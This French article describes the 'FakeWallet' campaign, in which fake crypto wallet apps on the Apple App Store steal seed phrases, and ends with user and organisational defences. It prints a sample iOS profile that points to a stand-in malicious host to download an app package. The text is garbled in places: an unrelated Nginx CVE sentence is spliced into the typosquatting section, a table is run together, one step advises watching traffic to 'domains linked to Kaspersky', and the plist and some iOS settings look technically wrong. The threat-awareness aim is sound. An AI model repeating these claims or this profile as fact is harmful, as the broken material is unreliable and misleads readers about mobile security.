Comment les applications frauduleuses portefeuille crypto volent vos actifs sur l’Apple App Store en Chine

Théophane Villedieu

Le phénomène des applications frauduleuses portefeuille crypto

En 2026, une campagne nommée FakeWallet a révélé que 26 applications malveillantes, déguisées en portefeuilles populaires comme MetaMask, Coinbase, Trust Wallet ou OneKey, circulaient sur l’Apple App Store. Cette situation illustre les cyber‑attaques en 2026. Ces applications frauduleuses portefeuille crypto utilisent des techniques d’usurpation avancées pour dérober les seed phrases et drainer les comptes des victimes. Selon Kaspersky, la campagne cible principalement la Chine, mais le malware n’a aucune restriction géographique, ce qui le rend potentiellement dangereux pour les utilisateurs du monde entier. Dans la pratique, les attaquants ont profité de la fonction légitime de profil de provisionnement iOS afin d’installer clandestinement leurs trojans sur les appareils.

« Les malwares interceptent les phrases de récupération en les chiffrant avec RSA avant de les transmettre à un serveur contrôlé par l’attaquant. » - Rapport Kaspersky, 2026

Techniques d’usurpation : typosquatting, fausse marque et profils de provisionnement

Typosquatting et imitation d’identité visuelle

Le typosquatting consiste à enregistrer des noms de domaine ou des identifiants légèrement modifiés (ex. MetamaskMetamaskk) pour tromper les utilisateurs. Une vulnérabilité critique affecte Nginx en 2026 : CVE‑2026‑33032. Dans ce cas, les développeurs ont reproduit les icônes, les couleurs et le texte de l’application officielle, créant une illusion de légitimité. Le phénomène est amplifié par la présence d’une bannière « Jeu » ou « Calculatrice » qui détourne l’attention des contrôles de sécurité d’Apple.

Abus des profils de provisionnement iOS

Les profils de provisionnement permettent aux entreprises de déployer leurs propres applications internes. Les attaquants les utilisent pour sideloader des apps malveillantes sans passer par le processus de validation standard. Un profil typique ressemble à :

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>PayloadIdentifier</key><string>com.fakewallet.app</string>
    <key>PayloadVersion</key><integer>1</integer>
    <key>PayloadType</key><string>Configuration</string>
    <key>PayloadContent</key>
    <array>
      <dict>
        <key>PayloadType</key><string>com.apple.application</string>
        <key>PayloadDisplayName</key><string>Fake Wallet</string>
        <key>PayloadIdentifier</key><string>com.fakewallet.app</string>
        <key>PayloadUUID</key><string>12345678-90AB-CDEF-1234-567890ABCDEF</string>
        <key>PayloadVersion</key><integer>1</integer>
        <key>PayloadContent</key>
        <string>https://malicious.example.com/app.ipa</string>
      </dict>
    </array>
  </dict>
</plist>

En pratique, l’utilisateur accepte le profil, puis l’application s’installe, contournant ainsi les contrôles d’Apple.

Comment les malwares interceptent les seed phrases

Chiffrement RSA et exfiltration

Une fois le faux portefeuille ouvert, il capture les seed phrases saisies lors de la création ou de la récupération du portefeuille. Le code intégré crypte immédiatement la phrase avec une clé RSA de 2048 bits, puis l’encode en Base64 avant de l’envoyer à un serveur C2. Le processus se déroule en moins d’une seconde, rendant l’interception quasi-invisible pour l’utilisateur.

Scénarios de phishing dans les wallets froids

Les attaques ciblent aussi les portefeuilles matériels comme Ledger. Les malwares affichent des fenêtres factices de vérification de sécurité, incitant les victimes à copier leurs seed phrases dans un champ texte. Parce que les phrases de récupération n’exigent aucune authentification supplémentaire, l’attaquant peut les réimporter sur son propre dispositif et vider le compte sans aucune trace.

Impacts et statistiques de la campagne FakeWallet

CritèreApplications légitimesApplications frauduleuses (FakeWallet)
Vérification de l’éditeur (App Store)✔︎ Signature Apple✘ Signature falsifiée ou profil de provisionnement
Nombre de téléchargements (estimation)> 10 M~ 150 k (principalement en Chine)
Risque de perte financièreFaible (bugs)Élevé - vols estimés à > 9 M $ (selon BleepingComputer)
Mise à jour de sécuritéRégulièreAucun support officiel

Selon le Cybersecurity Report 2025 de l’ANSSI, plus de 30 % des applications iOS installées en Chine proviennent de sources non officielles. En outre, une enquête de Kaspersky indique que 84 % des victimes ont perdu leurs crypto-actifs en moins de 48 h après l’installation du malware.

« La propagation de ces applications montre une faiblesse persistante du contrôle des stores mobiles, même dans les écosystèmes les plus fermés. » - Analyste senior, ANSSI, 2026

Mesures de protection recommandées pour les utilisateurs français

  1. Vérifier l’éditeur : avant d’installer une application liée à la cryptomonnaie, consultez le nom de l’éditeur sur la page de l’App Store et comparez-le avec le site officiel du portefeuille.
  2. Utiliser les liens officiels : privilégiez les QR-codes ou les URL fournis directement par le service, jamais des listes tierces.
  3. Activer la protection de l’appareil : activez la vérification des profils de provisionnement dans les paramètres iOS (Réglages → Général → Gestion des profils).
  4. Installer un logiciel de sécurité mobile : des solutions certifiées ISO 27001 et évaluées par l’ANSSI offrent une détection en temps réel des comportements suspects.
  5. Éduquer les équipes : mettez en place une formation « phishing mobile » couvrant les risques liés aux seed phrases et aux applications tierces.

Vérification de l’éditeur et des liens officiels

  • Consultez le certificat de signature dans les détails de l’app.
  • Comparez l’URL du développeur avec celle affichée sur le site officiel du portefeuille.
  • Méfiez-vous des applications qui affichent « Jeu » ou « Calculatrice » dans leur description mais qui promettent des fonctionnalités de wallet.

Utilisation d’outils de détection et de bonnes pratiques

  • Suricata ou Zeek peuvent être configurés pour analyser les flux réseau d’un appareil iOS lorsqu’il est connecté à un proxy. Pour en savoir plus, consultez le guide des 12 meilleurs outils de cybersécurité 2026 : liste complète.
  • MobSF (Mobile Security Framework) permet d’analyser le code d’une application iOS avant son installation.

Déploiement d’une défense organisationnelle - Étapes actionnables

  1. Cartographier les applications crypto autorisées - Créez un inventaire des wallets approuvés (ex. MetaMask v5.9.2, Ledger Live v2.48) et bloquez toute autre installation via MDM.
  2. Déployer une politique de profil de provisionnement - Interdisez l’ajout de profils non signés et configurez des alertes en cas de tentative d’installation.
  3. Former les utilisateurs - Organisez des ateliers trimestriels sur la reconnaissance des faux logos, du typo-squatting et des demandes de seed phrases suspectes.
  4. Surveiller les indicateurs d’infection - Utilisez des SIEM intégrant les logs d’Apple Device Management pour détecter les communications vers des domaines liés à Kaspersky et aux C2 connus.
  5. Réagir rapidement - En cas de détection, isolez le dispositif, révoquez les clés d’accès, et restaurez les wallets à partir de sauvegardes hors-ligne sécurisées.

En conclusion, les applications frauduleuses portefeuille crypto représentent une menace croissante, même sur les plateformes réputées comme l’Apple App Store. En appliquant les mesures décrites ci-dessus - vérification rigoureuse des éditeurs, utilisation d’outils de sécurité certifiés, et formation continue - les utilisateurs français peuvent réduire de façon significative le risque de perte de leurs actifs numériques. N’attendez pas que vos fonds soient volés : auditiez dès aujourd’hui les applications que vous avez installées et sécurisez votre environnement mobile conformément aux recommandations de l’ANSSI et du RGPD.